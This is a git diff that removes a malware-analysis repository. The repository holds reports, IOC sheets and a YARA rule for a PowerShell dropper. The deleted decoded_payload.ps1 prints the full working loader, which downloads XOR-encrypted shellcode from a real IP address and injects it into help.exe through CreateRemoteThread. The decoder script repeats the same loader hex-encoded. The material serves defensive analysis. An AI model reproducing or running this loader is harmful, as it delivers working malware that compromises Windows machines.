Technique ID | Name | Description | -|--------------|------|-------------| -| **T1059.001** | PowerShell | Uses PowerShell for execution | -| **T1055** | Process Injection | Injects code into help.exe | -| **T1055.012** | Process Hollowing | Creates suspended process and injects code | -| **T1027** | Obfuscated Files or Information | Multiple encoding layers | -| **T1140** | Deobfuscate/Decode Files | XOR decryption routine | -| **T1106** | Native API | Direct kernel32.dll API calls | -| **T1071.001** | Web Protocols | Downloads payload via HTTP | - ---- - -## Attack Flow Diagram - -``` -[Batch Script] - ↓ -[Launch PowerShell (Minimized)] - ↓ -[Decode Hex-Encoded Payload] - ↓ -[Load Windows API Functions] - ↓ -[Download logo.bin from 45.83.140.12] - ↓ -[XOR Decrypt Shellcode] - ↓ -[Create Suspended Process: help.exe] - ↓ -[Inject Shellcode into Process Memory] - ↓ -[Execute Remote Thread] - ↓ -[Malicious Payload Runs] -``` - ---- - -## Evasion Techniques - -1. **Multi-layer encoding** - Hex encoding obscures PowerShell commands -2. **Minimized window** - Runs hidden from user -3. **Process injection** - Hides malicious code in legitimate process -4. **XOR encryption** - Encrypts final payload -5. **Legitimate process abuse** - Uses Windows help.exe -6. **In-memory execution** - No files written to disk (fileless) - ---- - -## Risk Assessment - -| Category | Rating | Notes | -|----------|--------|-------| -| **Severity** | 🔴 Critical | Full system compromise possible | -| **Stealth** | 🟠 High | Multiple evasion techniques | -| **Persistence** | 🟡 Medium | Not demonstrated in this sample | -| **Data Theft** | ⚠️ Unknown | Depends on downloaded payload | -| **Lateral Movement** | ⚠️ Possible | Depending on payload capabilities | - ---- - -## Recommendations - -### Immediate Actions - -1. ✅ **DO NOT execute this code** -2. 🚫 **Block malicious IP:** Add `45.83.140.12` to firewall blocklist -3. 🔍 **Scan system:** Run full antivirus/EDR scan -4. 📊 **Check logs:** Review PowerShell execution logs -5. 🔎 **Hunt for IOCs:** Search for related artifacts - -### Defensive Measures - -1. **Network Security:** - - Block access to `45.83.140.12` - - Monitor outbound HTTP connections to unusual IPs - - Implement DNS filtering - -2. **Endpoint Security:** - - Enable PowerShell logging (Module, Script Block, Transcription) - - Use Application Whitelisting - - Deploy EDR solution - - Enable AMSI (Anti-Malware Scan Interface) - -3. **Detection Rules:** - - Monitor for `CreateRemoteThread` API calls - - Alert on PowerShell with `-EncodedCommand` or long command strings - - Detect `VirtualAllocEx` + `WriteProcessMemory` patterns - - Flag suspicious help.exe executions - -4. **User Awareness:** - - Train users not to execute unknown scripts - - Warn about email attachments with .bat/.cmd extensions - - Implement email filtering for malicious attachments - -### YARA Rule (Detection) - -```yara -rule Malicious_ProcessInjection_XOR_Loader -{ - meta: - description = "Detects PowerShell-based process injection with XOR decryption" - author = "Security Analysis" - date = "2025-12-29" - - strings: - $api1 = "VirtualAllocEx" ascii wide - $api2 = "WriteProcessMemory" ascii wide - $api3 = "CreateRemoteThread" ascii wide - $xor = "-bxor" ascii wide - $download = "DownloadData" ascii wide - $help = "help.exe" ascii wide nocase - - condition: - 4 of them -} -``` - ---- - -## Forensic Artifacts - -If this malware was executed, look for: - -1. **PowerShell logs** (Event ID 4103, 4104) -2. **Network connections** to 45.83.140.12 -3. **Process creation** of help.exe with unusual parent process -4. **Memory dumps** of help.exe process -5. **Prefetch files** for PowerShell and help.exe - ---- - -## Conclusion - -This is a **sophisticated malware sample** that demonstrates: -- Advanced obfuscation techniques -- Process injection capabilities -- Remote payload delivery -- Anti-detection measures - -**The actual damage depends on the downloaded payload**, which could be: -- Ransomware -- Information stealer -- Remote Access Trojan (RAT) -- Cryptocurrency miner -- Botnet agent - -**⚠️ If you encountered this in the wild, treat it as a confirmed compromise and initiate incident response procedures immediately.** - ---- - -## References - -- MITRE ATT&CK: https://attack.mitre.org/ -- Process Injection Techniques: https://attack.mitre.org/techniques/T1055/ -- PowerShell Security Best Practices: Microsoft Security Documentation - ---- - -**Report Generated:** 2025-12-29 -**Analysis Status:** Complete -**Malware Classification:** Dropper/Loader with Process Injection diff --git a/QUICK_REFERENCE.md b/QUICK_REFERENCE.md deleted file mode 100644 index fdd0b07..0000000 --- a/QUICK_REFERENCE.md +++ /dev/null @@ -1,132 +0,0 @@ -# Quick Reference - Malware Analysis - -## 🔴 THREAT CLASSIFICATION: CRITICAL MALWARE - ---- - -## What It Does (Simple Explanation) - -This is a **malicious script** that: -1. Downloads encrypted malware from a hacker's server -2. Decrypts it using XOR encryption -3. Injects the malware into a legitimate Windows program (help.exe) -4. Executes the malware while hiding it from detection - ---- - -## Key Information - -### Malicious Server -- **IP Address:** `45.83.140.12` -- **Download URL:** `http://45.83.140.12/pot/jack/logo.bin` - -### Target Process -- **Injection Target:** `c:\windows\SysWOW64\help.exe` - -### Attack Type -- **Category:** Process Injection / Code Injection -- **Method:** Process Hollowing -- **Language:** PowerShell (hidden) - ---- - -## Malicious Behavior Checklist - -- ✅ Downloads code from internet -- ✅ Uses encryption (XOR) -- ✅ Injects code into other processes -- ✅ Runs hidden (minimized window) -- ✅ Uses multiple encoding layers -- ✅ Manipulates Windows memory directly -- ✅ Creates threads in other processes - ---- - -## How to Protect Yourself - -### If You Haven't Run It -✅ Delete it immediately -✅ Block the IP address: `45.83.140.12` -✅ Scan your computer with antivirus - -### If You Already Ran It -🚨 **Your computer may be compromised** - -1. Disconnect from internet immediately -2. Run full antivirus scan -3. Check for suspicious processes (especially help.exe) -4. Contact IT security team -5. Consider professional malware removal -6. Change all passwords from a clean device - ---- - -## Technical Details (For Security Professionals) - -### Obfuscation Layers -1. Batch wrapper → 2. PowerShell scriptblock → 3. Hex encoding → 4. XOR encryption - -### API Functions Used -- `CreateProcess` (CREATE_SUSPENDED flag) -- `VirtualAllocEx` (PAGE_EXECUTE_READWRITE) -- `WriteProcessMemory` -- `CreateRemoteThread` -- `WaitForSingleObject` - -### Memory Permissions -- `0x40` = PAGE_EXECUTE_READWRITE (RWX - highly suspicious) -- `0x1000` = MEM_COMMIT - ---- - -## Detection Signatures - -### PowerShell Command Line -``` -Contains: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, -bxor -``` - -### Network Traffic -``` -HTTP GET to 45.83.140.12/pot/jack/logo.bin -``` - -### Process Behavior -``` -help.exe spawned by PowerShell with unusual memory allocations -``` - ---- - -## MITRE ATT&CK Techniques -- T1059.001 - PowerShell -- T1055.012 - Process Hollowing -- T1027 - Obfuscated Files -- T1140 - Deobfuscate/Decode -- T1071.001 - Web Protocols - ---- - -## Files Generated by Analysis - -1. **MALWARE_ANALYSIS_REPORT.md** - Full technical analysis -2. **decoded_payload.ps1** - Decoded PowerShell code (DO NOT RUN) -3. **decrypt_payload.py** - Python decryption script -4. **QUICK_REFERENCE.md** - This file - ---- - -## Bottom Line - -⚠️ **This is REAL malware designed to compromise Windows systems.** - -- **DO NOT** run this code -- **DO NOT** click links in suspicious emails -- **DO** keep antivirus updated -- **DO** report to security team if found in your organization - ---- - -**Date:** December 29, 2025 -**Threat Level:** 🔴 CRITICAL -**Malware Type:** Dropper/Loader with Process Injection diff --git a/README.md b/README.md deleted file mode 100644 index 69f14dd..0000000 --- a/README.md +++ /dev/null @@ -1,222 +0,0 @@ -# Malware Analysis - Payload Decryption and Analysis - -This repository contains a complete analysis of an obfuscated malicious Windows batch/PowerShell script that employs process injection techniques. - -## 🔴 CRITICAL WARNING - -**This repository contains analysis of REAL malware. DO NOT execute any of the decoded payloads.** - ---- - -## Overview - -The analyzed malware is a multi-stage dropper/loader that: -- Downloads encrypted shellcode from a remote server -- Decrypts the payload using XOR encryption -- Injects malicious code into legitimate Windows processes -- Executes using process hollowing techniques - ---- - -## Files in This Repository - -### Analysis Reports -- **[MALWARE_ANALYSIS_REPORT.md](MALWARE_ANALYSIS_REPORT.md)** - Comprehensive technical analysis -- **[QUICK_REFERENCE.md](QUICK_REFERENCE.md)** - Quick reference guide and IOCs - -### Decoded Payloads (DO NOT EXECUTE) -- **[decoded_payload.ps1](decoded_payload.ps1)** - Decoded PowerShell malware - -### Analysis Tools -- **[decrypt_payload.py](decrypt_payload.py)** - Python script to decode the hex-encoded payload - ---- - -## Quick Summary - -### Threat Level -🔴 **CRITICAL** - -### Malware Type -- Dropper/Loader -- Process Injection -- Shellcode Execution - -### Key IOCs - -**Malicious Infrastructure:** -``` -IP: 45.83.140.12 -URL: http://45.83.140.12/pot/jack/logo.bin -``` - -**Injection Target:** -``` -Process: c:\windows\SysWOW64\help.exe -``` - -### MITRE ATT&CK Techniques -- T1059.001 - PowerShell -- T1055.012 - Process Hollowing -- T1027 - Obfuscated Files or Information -- T1140 - Deobfuscate/Decode Files or Information -- T1071.001 - Web Protocols - ---- - -## How to Use This Analysis - -### For Security Analysts -1. Read the **MALWARE_ANALYSIS_REPORT.md** for detailed technical analysis -2. Use the IOCs to search your environment for compromise indicators -3. Implement the detection rules and defensive measures -4. Review the MITRE ATT&CK mappings for threat hunting - -### For Incident Responders -1. Check **QUICK_REFERENCE.md** for immediate IOCs -2. Block the malicious IP address: `45.83.140.12` -3. Hunt for the process injection patterns in your environment -4. Review PowerShell logs for similar obfuscation patterns - -### For Researchers -1. Examine the **decoded_payload.ps1** to understand the attack flow -2. Use **decrypt_payload.py** as a template for analyzing similar samples -3. Study the multi-layer obfuscation techniques employed - ---- - -## Running the Decryption Script - -To analyze the payload: - -```bash -python3 decrypt_payload.py -``` - -This will display: -- The decoded PowerShell payload -- Analysis summary -- IOCs -- Recommendations - ---- - -## Key Findings - -### Attack Flow -1. Batch script launches PowerShell in minimized window -2. PowerShell decodes hex-encoded payload -3. Creates Windows API bindings for process manipulation -4. Downloads encrypted shellcode from `45.83.140.12` -5. XOR-decrypts the payload using first byte as key -6. Creates suspended `help.exe` process -7. Injects shellcode into process memory -8. Executes malicious payload via remote thread - -### Evasion Techniques -- Multi-layer encoding (Batch → PowerShell → Hex → XOR) -- Minimized window execution -- Process injection to hide in legitimate process -- In-memory execution (fileless) -- XOR encryption of final payload - ---- - -## Recommendations - -### Immediate Actions -- ✅ Block IP address: `45.83.140.12` -- ✅ Enable PowerShell logging -- ✅ Monitor for process injection indicators -- ✅ Deploy EDR solution -- ✅ Scan systems for IOCs - -### Detection Rules -- Alert on `CreateRemoteThread` + `WriteProcessMemory` patterns -- Monitor PowerShell with long encoded commands -- Flag suspicious `help.exe` executions -- Detect XOR operations on downloaded content - ---- - -## Defensive Measures - -1. **Network Security** - - Block malicious IPs - - Monitor unusual HTTP connections - - Implement DNS filtering - -2. **Endpoint Security** - - Enable PowerShell logging (Script Block, Module, Transcription) - - Use Application Whitelisting - - Deploy EDR - - Enable AMSI - -3. **User Awareness** - - Train users on phishing - - Warn about suspicious attachments - - Implement email filtering - ---- - -## Technical Specifications - -**Programming Languages:** -- Windows Batch Script -- PowerShell -- C# (for P/Invoke declarations) - -**APIs Used:** -- `kernel32.dll` functions -- `CreateProcess` -- `VirtualAllocEx` -- `WriteProcessMemory` -- `CreateRemoteThread` - -**Encryption:** -- XOR with single-byte key (first byte of payload) - -**Network Protocol:** -- HTTP (unencrypted) - ---- - -## Disclaimer - -This analysis is provided for **educational and defensive purposes only**. The decoded malware samples are included to help security professionals understand the threat and develop appropriate defenses. - -**DO NOT:** -- Execute any of the decoded payloads -- Use this information for malicious purposes -- Access the malicious infrastructure - -**DO:** -- Use this analysis to protect your organization -- Share IOCs with your security team -- Implement the recommended defensive measures - ---- - -## Analysis Metadata - -- **Analysis Date:** December 29, 2025 -- **Malware Family:** Unknown (requires payload analysis) -- **Threat Actor:** Unknown -- **Campaign:** Unknown -- **Analysis Status:** Complete - ---- - -## Contact - -For questions about this analysis or to report similar samples, please consult with your organization's security team. - ---- - -## License - -This analysis is provided as-is for security research and defensive purposes. - ---- - -**Stay safe and keep your systems secure! 🛡️** diff --git a/decoded_payload.ps1 b/decoded_payload.ps1 deleted file mode 100644 index a2b38ce..0000000 --- a/decoded_payload.ps1 +++ /dev/null @@ -1,101 +0,0 @@ -# ============================================================================ -# DECODED MALICIOUS POWERSHELL PAYLOAD -# ============================================================================ -# WARNING: DO NOT EXECUTE THIS CODE - FOR ANALYSIS ONLY -# This is the decoded version of the hex-encoded malware payload -# ============================================================================ - -Add-Type -TypeDefinition @" -using System; -using System.Diagnostics; -using System.Runtime.InteropServices; -[StructLayout(LayoutKind.Sequential)] -public struct PROCESS_INFORMATION -{ - public IntPtr hP; - public IntPtr ht; - public uint dwProcessId; - public uint dwThreadId; -} -[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] -public struct STARTUPINFO -{ - public uint cb; - public string lpReserved; - public string lpDesktop; - public string lpTitle; - public uint dwX; - public uint dwY; - public uint dwXSize; - public uint dwYSize; - public uint dwXCountChars; - public uint dwYCountChars; - public uint dwFillAttribute; - public uint dwFlags; - public uint wShowWindow; - public short cbReserved2; - public IntPtr lpReserved2; - public IntPtr hStdInput; - public IntPtr hStdOutput; - public IntPtr hStdError; -} -public static class Kernel32 -{ - [DllImport("kernel32.dll")] - public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j); - [DllImport("kernel32.dll")] - public static extern IntPtr GlobalAlloc(uint a,uint b); - [DllImport("kernel32.dll")] - public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e); - [DllImport("kernel32.dll")] - public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e); - [DllImport("kernel32.dll")] - public static extern IntPtr WaitForSingleObject(IntPtr a,uint b); - [DllImport("kernel32.dll")] - public static extern IntPtr CreateRemoteThread(IntPtr a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g); -} -"@ - -# Download encrypted shellcode from malicious server -$webClient = New-Object System.Net.WebClient -$url = "http://45.83.140.12/pot/jack/logo.bin" - -$shellbuf = $webClient.DownloadData($url) -$shellsize = $shellbuf.Length - -# XOR decrypt the downloaded payload using first byte as key -for ($i = 1; $i -lt $shellsize; $i++) { - $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] -} - -# Initialize structures for process creation -$si = New-Object STARTUPINFO; -$pi = New-Object PROCESS_INFORMATION; - -# Allocate global memory for shellcode -$addr = [Kernel32]::GlobalAlloc(0x40, $shellsize + 100); - -# Copy decrypted shellcode to allocated memory -for ($i = 1;$i -lt $shellsize;$i++){ - [System.Runtime.InteropServices.Marshal]::WriteByte($addr, $i - 1, $shellbuf[$i]); -} - -# Create suspended process (help.exe) for injection -# Flag 0x04 = CREATE_SUSPENDED -[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi); - -# Get handle to created process -$kZZZZ=$pi.hP; - -# Allocate memory in target process with RWX permissions -# 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE -$mZZZZ=[Kernel32]::VirtualAllocEx($kZZZZ,0,$shellsize + 100,0x1000,0x40); - -# Write shellcode to target process memory -[Kernel32]::WriteProcessMemory($kZZZZ,$mZZZZ,$addr, $shellsize, 0); - -# Create remote thread in target process to execute shellcode -$lZZZZ = [Kernel32]::CreateRemoteThread($kZZZZ, 0, 0, $mZZZZ, 0, 0, 0); - -# Wait for shellcode execution (500 seconds timeout) -[Kernel32]::WaitForSingleObject($lZZZZ, 500*1000); diff --git a/decrypt_payload.py b/decrypt_payload.py deleted file mode 100644 index c9867fb..0000000 --- a/decrypt_payload.py +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/env python3 -""" -Payload Decryption and Analysis Script -This script safely decodes obfuscated malicious code without executing it. -""" - -def hex_to_string(hex_string): - """Convert hex string to ASCII string""" - result = "" - for i in range(0, len(hex_string), 2): - hex_byte = hex_string[i:i+2] - result += chr(int(hex_byte, 16)) - return result - -def main(): - # The hex-encoded payload from the malicious script - hex_payload = "4164642D54797065202D54797065446566696E6974696F6E2040220A7573696E672053797374656D3B0A7573696E672053797374656D2E446961676E6F73746963733B0A7573696E672053797374656D2E52756E74696D652E496E7465726F7053657276696365733B0A5B5374727563744C61796F7574284C61796F75744B696E642E53657175656E7469616C295D0A7075626C6963207374727563742050524F434553535F494E464F524D4154494F4E0A7B0A202020207075626C696320496E745074722068503B0A202020207075626C696320496E745074722068743B0A202020207075626C69632075696E7420647750726F6365737349643B0A202020207075626C69632075696E7420647754687265616449643B0A7D0A5B5374727563744C61796F7574284C61796F75744B696E642E53657175656E7469616C2C2043686172536574203D20436861725365742E556E69636F6465295D0A7075626C6963207374727563742053544152545550494E464F0A7B0A202020207075626C69632075696E742063623B0A202020207075626C696320737472696E67206C7052657365727665643B0A202020207075626C696320737472696E67206C704465736B746F703B0A202020207075626C696320737472696E67206C705469746C653B0A202020207075626C69632075696E74206477583B0A202020207075626C69632075696E74206477593B0A202020207075626C69632075696E742064775853697A653B0A202020207075626C69632075696E742064775953697A653B0A202020207075626C69632075696E7420647758436F756E7443686172733B0A202020207075626C69632075696E7420647759436F756E7443686172733B0A202020207075626C69632075696E7420647746696C6C4174747269627574653B0A202020207075626C69632075696E74206477466C6167733B0A202020207075626C69632075696E74207753686F7757696E646F773B0A202020207075626C69632073686F72742063625265736572766564323B0A202020207075626C696320496E74507472206C705265736572766564323B0A202020207075626C696320496E745074722068537464496E7075743B0A202020207075626C696320496E7450747220685374644F75747075743B0A202020207075626C696320496E7450747220685374644572726F723B0A7D0A7075626C69632073746174696320636C617373204B65726E656C33320A7B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20626F6F6C2043726561746550726F6365737328737472696E6720612C737472696E6720622C75696E7420632C75696E7420642C626F6F6C20652C75696E7420662C496E7450747220672C737472696E6720682C207265662053544152545550494E464F20692C6F75742050524F434553535F494E464F524D4154494F4E206A293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420612C75696E742062293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F63457828496E7450747220612C496E7450747220622C2075696E7420632C75696E7420642C2075696E74202065293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20626F6F6C20577269746550726F636573734D656D6F727928496E7450747220612C496E7450747220622C496E7450747220632C75696E742020642C496E745074722065293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E745074722043726561746552656D6F746554687265616428496E7450747220612C496E7450747220622C75696E7420632C496E7450747220642C496E7450747220652C75696E7420662C496E745074722067293B0A7D0A22400A0A24776562436C69656E74203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E740A2475726C203D2022687474703A2F2F34352E38332E3134302E31322F706F742F6A61636B2F6C6F676F2E62696E220A0A247368656C6C627566203D2024776562436C69656E742E446F776E6C6F616444617461282475726C290A247368656C6C73697A65203D20247368656C6C6275662E4C656E6774680A666F7220282469203D20313B202469202D6C7420247368656C6C73697A653B2024692B2B29207B0A20202020247368656C6C6275665B24695D203D20247368656C6C6275665B24695D202D62786F7220247368656C6C6275665B305D0A7D0A0A247369203D204E65772D4F626A6563742053544152545550494E464F3B0A247069203D204E65772D4F626A6563742050524F434553535F494E464F524D4154494F4E3B0A2461646472203D205B4B65726E656C33325D3A3A476C6F62616C416C6C6F6328307834302C20247368656C6C73697A65202B20313030293B0A666F7220282469203D20313B2469202D6C7420247368656C6C73697A653B24692B2B297B0A095B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A5772697465427974652824616464722C202469202D20312C20247368656C6C6275665B24695D293B0A7D0A5B4B65726E656C33325D3A3A43726561746550726F636573732822633A5C77696E646F77735C537973574F5736345C68656C702E657865222C302C302C302C302C307830342C302C22633A222C5B7265665D202473692C5B7265665D20247069293B0A246B5A5A5A5A3D2470692E68503B0A246D5A5A5A5A3D5B4B65726E656C33325D3A3A5669727475616C416C6C6F63457828246B5A5A5A5A2C302C247368656C6C73697A65202B203130302C3078313030302C30783430293B0A5B4B65726E656C33325D3A3A577269746550726F636573734D656D6F727928246B5A5A5A5A2C246D5A5A5A5A2C24616464722C20247368656C6C73697A652C2030293B0A246C5A5A5A5A203D205B4B65726E656C33325D3A3A43726561746552656D6F746554687265616428246B5A5A5A5A2C20302C20302C20246D5A5A5A5A2C20302C20302C2030293B0A5B4B65726E656C33325D3A3A57616974466F7253696E676C654F626A65637428246C5A5A5A5A2C203530302A31303030293B0A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" - - print("=" * 80) - print("MALWARE ANALYSIS REPORT") - print("=" * 80) - print() - - # Decode the hex payload - decoded = hex_to_string(hex_payload) - - print("DECODED POWERSHELL PAYLOAD:") - print("-" * 80) - print(decoded) - print() - - print("=" * 80) - print("ANALYSIS SUMMARY") - print("=" * 80) - print() - print("⚠️ THREAT LEVEL: CRITICAL - This is MALICIOUS CODE") - print() - print("What this malware does:") - print() - print("1. PROCESS INJECTION TECHNIQUE:") - print(" - Creates Windows API definitions for process manipulation") - print(" - Uses kernel32.dll functions for memory manipulation") - print() - print("2. DOWNLOADS MALICIOUS PAYLOAD:") - print(" - URL: http://45.83.140.12/pot/jack/logo.bin") - print(" - Downloads binary shellcode from a remote server") - print() - print("3. XOR DECRYPTION:") - print(" - The downloaded payload is XOR-encrypted") - print(" - Uses first byte as the XOR key to decrypt the rest") - print(" - This obfuscates the actual malicious code") - print() - print("4. PROCESS INJECTION:") - print(" - Creates a suspended process: c:\\windows\\SysWOW64\\help.exe") - print(" - Allocates memory in the target process") - print(" - Writes the decrypted shellcode into the process memory") - print(" - Creates a remote thread to execute the injected code") - print(" - Waits for execution (500 seconds timeout)") - print() - print("5. EXECUTION METHOD:") - print(" - Runs in a minimized window to avoid detection") - print(" - Uses multiple encoding layers (hex encoding)") - print(" - Employs process hollowing/injection techniques") - print() - print("=" * 80) - print("INDICATORS OF COMPROMISE (IOCs)") - print("=" * 80) - print() - print("Malicious IP/URL:") - print(" - 45.83.140.12") - print(" - http://45.83.140.12/pot/jack/logo.bin") - print() - print("Targeted Process:") - print(" - c:\\windows\\SysWOW64\\help.exe") - print() - print("Techniques Used:") - print(" - T1055 - Process Injection") - print(" - T1055.012 - Process Hollowing") - print(" - T1027 - Obfuscated Files or Information") - print(" - T1140 - Deobfuscate/Decode Files or Information") - print(" - T1059.001 - PowerShell") - print() - print("=" * 80) - print("RECOMMENDATIONS") - print("=" * 80) - print() - print("1. DO NOT execute this code") - print("2. Block the malicious IP address: 45.83.140.12") - print("3. Scan your system with updated antivirus software") - print("4. Check for signs of compromise if this was executed") - print("5. Report this to your security team immediately") - print() - -if __name__ == "__main__": - main()